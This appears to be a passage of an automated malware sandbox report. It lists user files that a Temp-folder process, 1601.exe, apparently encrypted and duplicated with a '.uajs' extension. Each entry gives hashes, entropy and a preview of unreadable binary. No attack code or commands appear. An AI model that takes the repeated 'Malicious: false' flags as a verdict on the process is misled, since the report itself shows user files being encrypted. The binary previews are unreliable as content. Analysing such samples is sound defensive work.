Preview:	EOWRV.=.r........@P".%U..j..#........I.8?......Q.:H......x'......'.O.@.`>......!.k....@./e.h.Uc....:...n...Q...c..7JPmI....Au..Py.H..,n.N..;.Kf..N.$........s.^....Ci...{=..p..0.Vq...@8.Q..vD0.........@#Wx........hk..b..T...,g.o.}.......NSI.QP...7...=.0..<.......c.K%...X..t.=...! .........A...o.w{0..'.....?......../.X../0.T..5.U...%T.0.. q.....^..ZU.ZI..y$3gS..o...J.!..j....-.....]g.q.[..kM.D...LT.....Ir..1.z.R.J...%......O....u.].....C...>.G7..h[...!...t..B.Z.\u....yL..2x~.....4...<..\|P..,.Ice.G...@..B'.....Y:..`V.E_.....H..9...dt.Qr..../.we.....C.c~W......=,........%.Nx!...SFL...\|.Xd.......{..g.l3.@T..H..@6.Q...(.SD,:.,....rU.......2Igf.QH8...z.?...."O....V..S...^:..H....k.+....l....y....]....E.@....Mv.*..$.G.B.R&......H.m ..?Hi..q.p..;.x....g.Oo}N.......L..X.f.Pf..N..J..>.R..@.....b...mEcS.}.d8.6.r..&..!.....;..VZ.qjz.g.N..U...F..0.e..Q...G..d...!...1...+%....`.^.....eN....w.)..C.b..-......s.?....BJ../.<'....t1?..r..z.T...>.Z;E

C:\Users\user\Desktop\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846405483058489
Encrypted:	false
SSDEEP:	24:PNR9+07EX1j1QABuhwI7/IcH4Qx5PJIP5jrhOnob/lr2MY6vyHpl2Ew1bD:PNW+ABk9TIcYeglrhOnejY6vyJlryD
MD5:	A308407A4F2C15AB25332C01AF6876AC
SHA1:	07B04005D049E7CE571B982D5BC6FA5B0C8B7F75
SHA-256:	B8475FFAB9FD6C0DC0A66A86B1443ECC07C8D3D2FF5B683644F8AE451B8A5AD5
SHA-512:	C4A097FFD3DC359C9AED054D90FA45A7D5FBCE52D4DFFD317BEAA60F5A8DCECE2D3ADF837E4C3E62A6876ACBC1B59C37035E6E27841E15B3370BCB5FCF2C55E1
Malicious:	false
Preview:	EOWRV4M&....(...G.S0>,b..Z.5...`-..r1..B=.gM......1.Q.K...l...s. J.M.VC....W....Do{....J.....-.yL..zx.a.\2v. W._.m"....e......X4:.7.l.4...5....wE.)..v.....<.X...oC:.!,......'.N..$e..@...s.......N.".X..`d....3K..le.t....tJ.!2..b>..f..=\..r..ft\|.%...x...,[.....f( m3.Z.i`...:$..I..^../B......c.E..O.G.v...2h....S....K@g(....Y..B...-......WE...)...U2z...V....kR.....A...........y...G....^...=.o....x.'f.UW.L...p"+3......(.....&g.0........'4..1a...g{.@........2C.....b.......AD....DQ....~>&.xSEK.~j...a...........%m.....e?.....5.Q.....[U.E.0..."C....A..yn...q.x1~..F\|.5P.D....l.L...."...3.....Xv_.g.....o....L....&....3...ON\.4d).......>..zmK...x.H0q.:C.w...%p....JO....E..z....... .,.l......i...b...........2....?n.._..6..^.Ak.....9...6E..{9Fx.l.Wt..!.M5j..O.l.......8#f"....#......\........@.x...N...N,9]\|.F"i.0.^9...A.....`tT....\..Hf$.....^M`.~H.4)4. <i.....j..Dt7.....3..k:..C.X.....UD..n.W....z..:...3.....%^!.?K....X4Z..G9....!2

C:\Users\user\Desktop\EOWRVPQCCS.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846405483058489
Encrypted:	false
SSDEEP:	24:PNR9+07EX1j1QABuhwI7/IcH4Qx5PJIP5jrhOnob/lr2MY6vyHpl2Ew1bD:PNW+ABk9TIcYeglrhOnejY6vyJlryD
MD5:	A308407A4F2C15AB25332C01AF6876AC
SHA1:	07B04005D049E7CE571B982D5BC6FA5B0C8B7F75
SHA-256:	B8475FFAB9FD6C0DC0A66A86B1443ECC07C8D3D2FF5B683644F8AE451B8A5AD5
SHA-512:	C4A097FFD3DC359C9AED054D90FA45A7D5FBCE52D4DFFD317BEAA60F5A8DCECE2D3ADF837E4C3E62A6876ACBC1B59C37035E6E27841E15B3370BCB5FCF2C55E1
Malicious:	false
Preview:	EOWRV4M&....(...G.S0>,b..Z.5...`-..r1..B=.gM......1.Q.K...l...s. J.M.VC....W....Do{....J.....-.yL..zx.a.\2v. W._.m"....e......X4:.7.l.4...5....wE.)..v.....<.X...oC:.!,......'.N..$e..@...s.......N.".X..`d....3K..le.t....tJ.!2..b>..f..=\..r..ft\|.%...x...,[.....f( m3.Z.i`...:$..I..^../B......c.E..O.G.v...2h....S....K@g(....Y..B...-......WE...)...U2z...V....kR.....A...........y...G....^...=.o....x.'f.UW.L...p"+3......(.....&g.0........'4..1a...g{.@........2C.....b.......AD....DQ....~>&.xSEK.~j...a...........%m.....e?.....5.Q.....[U.E.0..."C....A..yn...q.x1~..F\|.5P.D....l.L...."...3.....Xv_.g.....o....L....&....3...ON\.4d).......>..zmK...x.H0q.:C.w...%p....JO....E..z....... .,.l......i...b...........2....?n.._..6..^.Ak.....9...6E..{9Fx.l.Wt..!.M5j..O.l.......8#f"....#......\........@.x...N...N,9]\|.F"i.0.^9...A.....`tT....\..Hf$.....^M`.~H.4)4. <i.....j..Dt7.....3..k:..C.X.....UD..n.W....z..:...3.....%^!.?K....X4Z..G9....!2

C:\Users\user\Desktop\EOWRVPQCCS\EIVQSAOTAQ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846785868508521
Encrypted:	false
SSDEEP:	24:RYhUpujGP1jHoZr/RVqccY14QAjhI7xg+Q07O+SZTIOcUqrkX32grw1bD:8UQjGUVuYiQAjqLQ0C7iWqetyD
MD5:	3E30D7731CAA075182C4C6B8C82A558D
SHA1:	8B704DF3A8A0ECAD63B9852A0A982BF04280AFB9
SHA-256:	2C3A7D4C2DFA675B94CB3CEAA9C05997F729BA8B7DC082C58D4F4DE612EEADDE
SHA-512:	A0A9F41FD27046FC5BFB026AF20C73AF3DA06D813328B46C3AD6A8B0B004168BAD64848DEE2F4532A4FD3338657BC7B3CA0CE6758FCD2B9E4E045AAB838F0D6E
Malicious:	false
Preview:	EIVQS..IJ.~..pP)..Z.....N...d....E,..l.u!..<.9)1..7d.CS~b...O.g.p..>!..Z..!...K!.b.....Z......../.V.....{\|O2D&B.s..T......z..)h`................`k'.....L..h0...{/K..f.,.7....).&d..5.}.(..Sl..T.y]}..U........X......./.....$..,I.%........IzK..x.....7.P.Z.....u........k.)N...R..S...E.+.....8.......+?..\....$....TvLtN...).7.;g...'>O.$"..x:.L;..\|.8i2\|m6#...QI...kJ..xl....&.nF'~'50...>..$.#...jC..s.YW....;O..t. ....-.l.[3..Xf:O.....4.t.C.m..0...e...X.A......K_\|..6..;..,o.3.8].8........n.~.N. h..P.....1=#..^.bx....._~....W....p..P...w+....n.f5mDe.26...,..x...~.h7.#..i..I..<;G..N<XU....?....M.?@..tu.._..+J.L.`.....tS/..7:..6.[....E.<K.[k.e..........J.Bx.X.....q..;7.Y..P.....<....Z..c._.....Mh.)v.$.<..9..L9......Aye...\|.Em..'N.<...O....C.....F.-B...pH..W..+,e..i......o..'l..qz....H..a6...p...B.R....ItB..0(~h$h.>.....CJ.yiU...:...x$.....sZ.C..i.Oc...).rfI.#....@........!..U.+./...G..)c.rE.V+.H..]...8..~<.T...I....b{.4..).R*........m.@%...ezQ.

C:\Users\user\Desktop\EOWRVPQCCS\EIVQSAOTAQ.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846785868508521
Encrypted:	false
SSDEEP:	24:RYhUpujGP1jHoZr/RVqccY14QAjhI7xg+Q07O+SZTIOcUqrkX32grw1bD:8UQjGUVuYiQAjqLQ0C7iWqetyD
MD5:	3E30D7731CAA075182C4C6B8C82A558D
SHA1:	8B704DF3A8A0ECAD63B9852A0A982BF04280AFB9
SHA-256:	2C3A7D4C2DFA675B94CB3CEAA9C05997F729BA8B7DC082C58D4F4DE612EEADDE
SHA-512:	A0A9F41FD27046FC5BFB026AF20C73AF3DA06D813328B46C3AD6A8B0B004168BAD64848DEE2F4532A4FD3338657BC7B3CA0CE6758FCD2B9E4E045AAB838F0D6E
Malicious:	false
Preview:	EIVQS..IJ.~..pP)..Z.....N...d....E,..l.u!..<.9)1..7d.CS~b...O.g.p..>!..Z..!...K!.b.....Z......../.V.....{\|O2D&B.s..T......z..)h`................`k'.....L..h0...{/K..f.,.7....).&d..5.}.(..Sl..T.y]}..U........X......./.....$..,I.%........IzK..x.....7.P.Z.....u........k.)N...R..S...E.+.....8.......+?..\....$....TvLtN...).7.;g...'>O.$"..x:.L;..\|.8i2\|m6#...QI...kJ..xl....&.nF'~'50...>..$.#...jC..s.YW....;O..t. ....-.l.[3..Xf:O.....4.t.C.m..0...e...X.A......K_\|..6..;..,o.3.8].8........n.~.N. h..P.....1=#..^.bx....._~....W....p..P...w+....n.f5mDe.26...,..x...~.h7.#..i..I..<;G..N<XU....?....M.?@..tu.._..+J.L.`.....tS/..7:..6.[....E.<K.[k.e..........J.Bx.X.....q..;7.Y..P.....<....Z..c._.....Mh.)v.$.<..9..L9......Aye...\|.Em..'N.<...O....C.....F.-B...pH..W..+,e..i......o..'l..qz....H..a6...p...B.R....ItB..0(~h$h.>.....CJ.yiU...:...x$.....sZ.C..i.Oc...).rfI.#....@........!..U.+./...G..)c.rE.V+.H..]...8..~<.T...I....b{.4..).R*........m.@%...ezQ.

C:\Users\user\Desktop\EOWRVPQCCS\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843345097620128
Encrypted:	false
SSDEEP:	24:iuDrTsxribXRIMYYdqG0NrLd8haclHwJtAWhkxHryO1NZiF3QWs/ArG75w1bD:ikUib+Ydz0NvGHwbrhoLDnm8AreyD
MD5:	4869B6007D959EA7F38546710391BC0F
SHA1:	8E0F6171DFBC0CB82DA779048ECFAAEF9F517723
SHA-256:	6ECB5CBE299517969E8E3544FCE8AA427491FF7207916829C0E5D76468192F2F
SHA-512:	F01879DEC1477AF2C0ADDED9494894240E0B8180626ABCCB7217474B5D86C73A1F9B4FE85404D3D3324B49E5F81466099D615C87EB2A701AE3AC2E8D5069196E
Malicious:	false
Preview:	EOWRV..>..[..%0.lH...<..Y..\0-....2......9X..>.J+>?.....6...T....pQ7..G..K..j.......g..Z...7./..pn.i.....G..8j.P...H..)...Q(.`...f...nx.D#.$..q$..q.._...t~...u..HnP:c.r.l..`..;..9M(...>......X.......m.....#...^.A....q0...W....w....ML..D..dr'.s..k...s.....q.\.0H.._{..'.....a.M.R..&.Q...1...."c6...=..4_..G.r..c'.X..a.Ph.uh..'wh...r....}...,..i....Z.c.p.n.Ep...en..S...FB....j.'.F..89.. 4.>q..z.xhg...2.K:aIq.k..n.q..<0.D6....X....3.].....Esc......i}.+...NE=NH......B@Y....F.}...@.WD.......q.\|..{.q.....S..i.=Q&..sQC>../..R."Q.[..m.pR.R...7...GZ".;-_.\#....Y."....\|..y..........4..^B0......s..y...e....k..8..}#F.T.Jtf..n.PS.y..{:...Lt..S.q.Bv.........=..@.._.l.:f.?........gm.X...%!......R2....D.2........\|.[.c'.2.x{.NfU.-.I+rB=.........!P...b.o.._..l4...Y@.%P..5.1.7G..6..e..4.....Y./.Uf...I......\G.7^..4.L5.[.2..x..G..oi$.eH.).9..W......TW=:(.L...\.m....u..b.M\|....w._.P..k..U...........B.U".M22.}....w...Z-.M....:t.....{.(";..XxP.;.y8.}..m.

C:\Users\user\Desktop\EOWRVPQCCS\EOWRVPQCCS.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843345097620128
Encrypted:	false
SSDEEP:	24:iuDrTsxribXRIMYYdqG0NrLd8haclHwJtAWhkxHryO1NZiF3QWs/ArG75w1bD:ikUib+Ydz0NvGHwbrhoLDnm8AreyD
MD5:	4869B6007D959EA7F38546710391BC0F
SHA1:	8E0F6171DFBC0CB82DA779048ECFAAEF9F517723
SHA-256:	6ECB5CBE299517969E8E3544FCE8AA427491FF7207916829C0E5D76468192F2F
SHA-512:	F01879DEC1477AF2C0ADDED9494894240E0B8180626ABCCB7217474B5D86C73A1F9B4FE85404D3D3324B49E5F81466099D615C87EB2A701AE3AC2E8D5069196E
Malicious:	false
Preview:	EOWRV..>..[..%0.lH...<..Y..\0-....2......9X..>.J+>?.....6...T....pQ7..G..K..j.......g..Z...7./..pn.i.....G..8j.P...H..)...Q(.`...f...nx.D#.$..q$..q.._...t~...u..HnP:c.r.l..`..;..9M(...>......X.......m.....#...^.A....q0...W....w....ML..D..dr'.s..k...s.....q.\.0H.._{..'.....a.M.R..&.Q...1...."c6...=..4_..G.r..c'.X..a.Ph.uh..'wh...r....}...,..i....Z.c.p.n.Ep...en..S...FB....j.'.F..89.. 4.>q..z.xhg...2.K:aIq.k..n.q..<0.D6....X....3.].....Esc......i}.+...NE=NH......B@Y....F.}...@.WD.......q.\|..{.q.....S..i.=Q&..sQC>../..R."Q.[..m.pR.R...7...GZ".;-_.\#....Y."....\|..y..........4..^B0......s..y...e....k..8..}#F.T.Jtf..n.PS.y..{:...Lt..S.q.Bv.........=..@.._.l.:f.?........gm.X...%!......R2....D.2........\|.[.c'.2.x{.NfU.-.I+rB=.........!P...b.o.._..l4...Y@.%P..5.1.7G..6..e..4.....Y./.Uf...I......\G.7^..4.L5.[.2..x..G..oi$.eH.).9..W......TW=:(.L...\.m....u..b.M\|....w._.P..k..U...........B.U".M22.}....w...Z-.M....:t.....{.(";..XxP.;.y8.}..m.

C:\Users\user\Desktop\EOWRVPQCCS\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871148389720569
Encrypted:	false
SSDEEP:	24:+dnGpScIFHTEoAPqCTT2asWyWJVbW8B2DclftzT7EfkpxOH5Ei0GAw1bD:gBVFHUPqL1yJlGwllT7o8AZBWyD
MD5:	231C2E63FCB95556223A5FB8A79766E3
SHA1:	0FD55D99608EE2704C3FE8188B8A6132005EA319
SHA-256:	FBD67EDC023E1D4C5F27BC32AB5876A916E82FD6F6CAD7168647334F933D275A
SHA-512:	1C073DB21411B33E3DCE59960F59A6E42F4B7AB56F8E235D2A5F6680D4F489184FCEB03735AC32A3676650F9F597B7346744EB56BBE1DD4B8D8C861BE2B557CB
Malicious:	false
Preview:	GIGIY.NT.}..Q.......O<...[...Id.r...sg..y..\..!..&.....-V(HW.5........1H.)=b.,..{c,W.[...y.M."p:...6.......8.4...u...`..7...F...I.....5.......'..{\|..B...h..4... t......%.P.%..%....:."..)a..:.=..G.d(`$.M..&..O.C.........U....M..e....H.}.l.......i..qE.........d.a..^.....O...Q.v..'.{.,E..o...6&z..T..5..p....H...:-..OD.0....T...T];......z..N$.w..u..._.-...m.........k'\|.#./.......C...bc...W.dF.N.......U.X..8..y...u..:C.4......n.B..o5....1.9........... ......7...R.I.W1..W.(.......PP5...xU......\|yW.p..1.mv(01..Z9G.c.,.lg...!...;.....&5...wa...R.U..a.<.#..n....3.Z.T\|x..@....I.....0O.z.\.\|:.=.f.d...Q....R....1.E.S.!..[(u........?.{....@.w..,}1....^..H.I#.<Ltxo.D!..Aqs.L...f..e..i.S..e.+,..k#...F......e[.........&.. bJ..<..:.n.q.f.8.2...L.8%r....A9.d......v$.s,e...$..C._...c..".^..l.....L#.s>D....,...,f3.S....5Bw...n..+a#.`.,.AG.Dxl..0X.L..\.-..8.z.el.3.../..."g1vq9jC.D..k..A...2.p!@.&.p.R..d<....=.........b$.j...4...y.L.....rph..\....+.....9:.

C:\Users\user\Desktop\EOWRVPQCCS\GIGIYTFFYT.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871148389720569
Encrypted:	false
SSDEEP:	24:+dnGpScIFHTEoAPqCTT2asWyWJVbW8B2DclftzT7EfkpxOH5Ei0GAw1bD:gBVFHUPqL1yJlGwllT7o8AZBWyD
MD5:	231C2E63FCB95556223A5FB8A79766E3
SHA1:	0FD55D99608EE2704C3FE8188B8A6132005EA319
SHA-256:	FBD67EDC023E1D4C5F27BC32AB5876A916E82FD6F6CAD7168647334F933D275A
SHA-512:	1C073DB21411B33E3DCE59960F59A6E42F4B7AB56F8E235D2A5F6680D4F489184FCEB03735AC32A3676650F9F597B7346744EB56BBE1DD4B8D8C861BE2B557CB
Malicious:	false
Preview:	GIGIY.NT.}..Q.......O<...[...Id.r...sg..y..\..!..&.....-V(HW.5........1H.)=b.,..{c,W.[...y.M."p:...6.......8.4...u...`..7...F...I.....5.......'..{\|..B...h..4... t......%.P.%..%....:."..)a..:.=..G.d(`$.M..&..O.C.........U....M..e....H.}.l.......i..qE.........d.a..^.....O...Q.v..'.{.,E..o...6&z..T..5..p....H...:-..OD.0....T...T];......z..N$.w..u..._.-...m.........k'\|.#./.......C...bc...W.dF.N.......U.X..8..y...u..:C.4......n.B..o5....1.9........... ......7...R.I.W1..W.(.......PP5...xU......\|yW.p..1.mv(01..Z9G.c.,.lg...!...;.....&5...wa...R.U..a.<.#..n....3.Z.T\|x..@....I.....0O.z.\.\|:.=.f.d...Q....R....1.E.S.!..[(u........?.{....@.w..,}1....^..H.I#.<Ltxo.D!..Aqs.L...f..e..i.S..e.+,..k#...F......e[.........&.. bJ..<..:.n.q.f.8.2...L.8%r....A9.d......v$.s,e...$..C._...c..".^..l.....L#.s>D....,...,f3.S....5Bw...n..+a#.`.,.AG.Dxl..0X.L..\.-..8.z.el.3.../..."g1vq9jC.D..k..A...2.p!@.&.p.R..d<....=.........b$.j...4...y.L.....rph..\....+.....9:.

C:\Users\user\Desktop\EOWRVPQCCS\QCOILOQIKC.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.821990926365364
Encrypted:	false
SSDEEP:	24:vTAGmwyuUhJX5c7cptIlH/lzv7rx3+thj3osIBw1bD:vtmB3f8xZxOh8hyD
MD5:	6446E27666C8134824F2942DBDFDF344
SHA1:	BAC972A0520F6843DCEA0DDB5A5A37B9932EA696
SHA-256:	D27319563C6F851B57BB79EBFBE0F412FC6655ABA92B0DD1A0569F655056282F
SHA-512:	2658A398B03BA214BCE2745984AF13E385F57FEC8E7FD51030D3A49E7E342F5D2C7F67EED5DD1593BE562B7830F61BD75D206AA578ADA64FA21402DA461A5663
Malicious:	false
Preview:	QCOIL..OAn....kT.......?=.?9.aX........@....8..8.:.za.<...v.vM..y.....>.....Y.I.wN........(.).}.r.$.....$8..c{-[Vb.G8..>7@..I#...).c..&.P.O..q..[0...j..I.......X.}wu.........<.q..0.@I6amB,ED..g.. ...G.Qo.Pj.....d!y...m.(.g.C+..9..g....hh\.b...U.K)..!...-.6..:.q.~h4H...>...........J~...W+.U...Q.!.E$:....;?..).l......59.........!.g.G.7T.k....X'K9...t..)j...Q....GQ^:&k..:.0v'.P../..4:z.L.6.S..U.Kp..S.iq..{r.N~.4.u.M/.T..;e0^.9.3.]T..(..4.B.../.F\.U.HPo..F......a..+.._...j..).3MNi....\.....V.~..Fm.I.......aX[.R>.l.H.P..s.x.i.]..!.R#..X.4.$..."A...+{T%nE..[..\>...{3.N.......Y.(."......s.zEP....@..HE..^.E..I9.h..yD..f.nQ.LGV....S_yN.&.................t....G.2B.iw..Z",#.8&/..{.6=.bF A..[!....'8...'......^'.R.cB..p.g.w...>^..E....mR.U.9t..N.....aK.LzZtyfs........1.../.(.#.M...f.\.\.$.C......5..~D.Gx....m.......I.q..@.>fZ#.......J.wI.&m....&.....m...d ./.o...z.....N?.3...Dxs.[......m.j..........lmM+.c..d.u..vVz.>l.h.=.3....`z.Yj.S:......5w.0. Z...g

C:\Users\user\Desktop\EOWRVPQCCS\QCOILOQIKC.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.821990926365364
Encrypted:	false
SSDEEP:	24:vTAGmwyuUhJX5c7cptIlH/lzv7rx3+thj3osIBw1bD:vtmB3f8xZxOh8hyD
MD5:	6446E27666C8134824F2942DBDFDF344
SHA1:	BAC972A0520F6843DCEA0DDB5A5A37B9932EA696
SHA-256:	D27319563C6F851B57BB79EBFBE0F412FC6655ABA92B0DD1A0569F655056282F
SHA-512:	2658A398B03BA214BCE2745984AF13E385F57FEC8E7FD51030D3A49E7E342F5D2C7F67EED5DD1593BE562B7830F61BD75D206AA578ADA64FA21402DA461A5663
Malicious:	false
Preview:	QCOIL..OAn....kT.......?=.?9.aX........@....8..8.:.za.<...v.vM..y.....>.....Y.I.wN........(.).}.r.$.....$8..c{-[Vb.G8..>7@..I#...).c..&.P.O..q..[0...j..I.......X.}wu.........<.q..0.@I6amB,ED..g.. ...G.Qo.Pj.....d!y...m.(.g.C+..9..g....hh\.b...U.K)..!...-.6..:.q.~h4H...>...........J~...W+.U...Q.!.E$:....;?..).l......59.........!.g.G.7T.k....X'K9...t..)j...Q....GQ^:&k..:.0v'.P../..4:z.L.6.S..U.Kp..S.iq..{r.N~.4.u.M/.T..;e0^.9.3.]T..(..4.B.../.F\.U.HPo..F......a..+.._...j..).3MNi....\.....V.~..Fm.I.......aX[.R>.l.H.P..s.x.i.]..!.R#..X.4.$..."A...+{T%nE..[..\>...{3.N.......Y.(."......s.zEP....@..HE..^.E..I9.h..yD..f.nQ.LGV....S_yN.&.................t....G.2B.iw..Z",#.8&/..{.6=.bF A..[!....'8...'......^'.R.cB..p.g.w...>^..E....mR.U.9t..N.....aK.LzZtyfs........1.../.(.#.M...f.\.\.$.C......5..~D.Gx....m.......I.q..@.>fZ#.......J.wI.&m....&.....m...d ./.o...z.....N?.3...Dxs.[......m.j..........lmM+.c..d.u..vVz.>l.h.=.3....`z.Yj.S:......5w.0. Z...g

C:\Users\user\Desktop\EOWRVPQCCS\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854422441085052
Encrypted:	false
SSDEEP:	24:Ow+iz4D6ZZymnDIX9KNUQiYqL+5qIwqkDX1fS+8Zg/HI3gjWhNt+FL8Qw1bD:OwXMD6ZZtIyUttStwqAlfS+bHI6WX8yD
MD5:	F0523CCA47755F4DCCB7675FA6127047
SHA1:	1EE06AD19831CE564312C5A0E1B3FA14CD8E338D
SHA-256:	71B596DE0373872490DC745AF1575156A919C3E2C5038BFC78CD265CB8CE2312
SHA-512:	58A8A877302E1B7B09753F47A9C1B920C56127CD272C0EDB138B4CC3FD8FFA194B7FA0C3B866C4ABE7963542D56D3543F3CDFB28138321B25C2BE65F33A5BC98
Malicious:	false
Preview:	TQDFJ?.U6md..a.x@G.`......vn@^<..M.2,.l.2..b.<h.].c..`\|.?........9..lTu,..S.0N.ja..}.Ff..).ab3#.h...........'.O$...e`.S .G.c..>...2..4F.....m].\|..]I4...d5..].I)....@j;\|......mj..T.P.....U1....>.,...q..!.QD+<y.. I..g..>.Q;F...0.....2'....&.o.YZlqVs./.pG~W8..s.....1...g.$}...Q...7.O\..2...c.k.\|.0..G5&P..A.}...p;.....5U..1c...-.@.x8....S.q......L..Ch.....E!.V\a.7.....m.w....&M....q..4.0$&../PQ.5y.q..J.X....?......F...5.(#^.u3]...a_ ?...=SJ.F./.J.......i....]....~.........\|..B..\....z..F.q.7......qo.J..r.}..y.J.......0...U..x'....g&.E.................y.V#..........<..R?u..l.W._.h...tKBD....z(...Q...y8....o.4G.3DA....\....\|.h.-..J..S!...J..z.....sD)MI...xM...L...rf.*'.S4..A9'd4....B.w[X.t....`.'.k..Z....%.Y....}4......v?..../..&!f........i..\l..<..n.OV./.A..A.%.}..(GF.....AC..W_.n....<..T.p1..G...jW...k.UE.......q"..O..shUrpl.R<...r.....gvf....U.6R..Rn..p.%-...8...).S.....T......L.zI....>Z......+<.h...N.v.[..9Ul(...:.0.k.h..0.

C:\Users\user\Desktop\EOWRVPQCCS\TQDFJHPUIU.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854422441085052
Encrypted:	false
SSDEEP:	24:Ow+iz4D6ZZymnDIX9KNUQiYqL+5qIwqkDX1fS+8Zg/HI3gjWhNt+FL8Qw1bD:OwXMD6ZZtIyUttStwqAlfS+bHI6WX8yD
MD5:	F0523CCA47755F4DCCB7675FA6127047
SHA1:	1EE06AD19831CE564312C5A0E1B3FA14CD8E338D
SHA-256:	71B596DE0373872490DC745AF1575156A919C3E2C5038BFC78CD265CB8CE2312
SHA-512:	58A8A877302E1B7B09753F47A9C1B920C56127CD272C0EDB138B4CC3FD8FFA194B7FA0C3B866C4ABE7963542D56D3543F3CDFB28138321B25C2BE65F33A5BC98
Malicious:	false
Preview:	TQDFJ?.U6md..a.x@G.`......vn@^<..M.2,.l.2..b.<h.].c..`\|.?........9..lTu,..S.0N.ja..}.Ff..).ab3#.h...........'.O$...e`.S .G.c..>...2..4F.....m].\|..]I4...d5..].I)....@j;\|......mj..T.P.....U1....>.,...q..!.QD+<y.. I..g..>.Q;F...0.....2'....&.o.YZlqVs./.pG~W8..s.....1...g.$}...Q...7.O\..2...c.k.\|.0..G5&P..A.}...p;.....5U..1c...-.@.x8....S.q......L..Ch.....E!.V\a.7.....m.w....&M....q..4.0$&../PQ.5y.q..J.X....?......F...5.(#^.u3]...a_ ?...=SJ.F./.J.......i....]....~.........\|..B..\....z..F.q.7......qo.J..r.}..y.J.......0...U..x'....g&.E.................y.V#..........<..R?u..l.W._.h...tKBD....z(...Q...y8....o.4G.3DA....\....\|.h.-..J..S!...J..z.....sD)MI...xM...L...rf.*'.S4..A9'd4....B.w[X.t....`.'.k..Z....%.Y....}4......v?..../..&!f........i..\l..<..n.OV./.A..A.%.}..(GF.....AC..W_.n....<..T.p1..G...jW...k.UE.......q"..O..shUrpl.R<...r.....gvf....U.6R..Rn..p.%-...8...).S.....T......L.zI....>Z......+<.h...N.v.[..9Ul(...:.0.k.h..0.

C:\Users\user\Desktop\EOWRVPQCCS\ZIPXYXWIOY.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850093079990212
Encrypted:	false
SSDEEP:	24:+w07+IvIVAnC4usV9dNxTIRnu1T96kRiiVxBa3uvGyu0TdvEB/uY+uPq/E8w1bD:TggOksV9fxTynU35Guv3PTtEBRfy/FyD
MD5:	1CF022473171CA2003D2EB8BA20919D6
SHA1:	2FEAC2BFFF2F8D4B37130DA5C9A8DC235F54ABF3
SHA-256:	E7B6730FC81B9816B59C52232EB2FF50012238DA5AAAAA7869EFDA4115659C7F
SHA-512:	BE0EC77768A84A652376F47CA6BD00999517F10738EACD63831BE735637C47A07DF9CE683D3B2F5F456FA90BF7DAC891A919605F501E55D71E506ED9ED99729D
Malicious:	false
Preview:	ZIPXY\...2.........n...p~.j.p..\a....6.<9E.=g%P..pQ....N.dl.F3ED.y.T..O....t...H.Ks.R..)...{.%F.....o...'...^\|.>7yM.D.....i\Q..&....\|..8...,E.3e%G.3..m...0."..........._...>...'...\|....8P..d.V....8.[.G.......z[d..OE.....`G+.K).@.f....<.@&.....2f...^g9.....wc...p....=R.zP..6.....B..nwX.@...}?..A...........:,k....O..S....L+._...W\..\|..S#.h..%.j./`r...C....1.&...[.Ml.Y.ze.d ..m...).M..=\m..0b.A....v...+......R,.....na....Q......!RJw..mU.\|"........................E...gA...f..V.ad.F......n.m....B..%......;.....[....[......(\.J7@v..xv..a.v.=.!1...0.?Me..X.(7...8A..........0..R...s..;..A0..m...0.....)0.$..0.w".Eany.....!..i%=[.]0R..r;'-Y .........BM<...v$.hMGe=...(..F........4...>..'.c.V..k.....#.'.)z...g}O'\...r....26.....i..8......?....+.M.X.n.<5.....}q.am...2.<b.~...j.E.X.Jj..m+.~..@\V......5Q.U....RA.....Z..y\|.......5....GE..(R..mr"....j...?O...>..\,.h..M9f8M..\..#.+..J....pi.O.^..U..x\|....\,.....}.......vS.\|..........<".w-..#.

C:\Users\user\Desktop\EOWRVPQCCS\ZIPXYXWIOY.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850093079990212
Encrypted:	false
SSDEEP:	24:+w07+IvIVAnC4usV9dNxTIRnu1T96kRiiVxBa3uvGyu0TdvEB/uY+uPq/E8w1bD:TggOksV9fxTynU35Guv3PTtEBRfy/FyD
MD5:	1CF022473171CA2003D2EB8BA20919D6
SHA1:	2FEAC2BFFF2F8D4B37130DA5C9A8DC235F54ABF3
SHA-256:	E7B6730FC81B9816B59C52232EB2FF50012238DA5AAAAA7869EFDA4115659C7F
SHA-512:	BE0EC77768A84A652376F47CA6BD00999517F10738EACD63831BE735637C47A07DF9CE683D3B2F5F456FA90BF7DAC891A919605F501E55D71E506ED9ED99729D
Malicious:	false
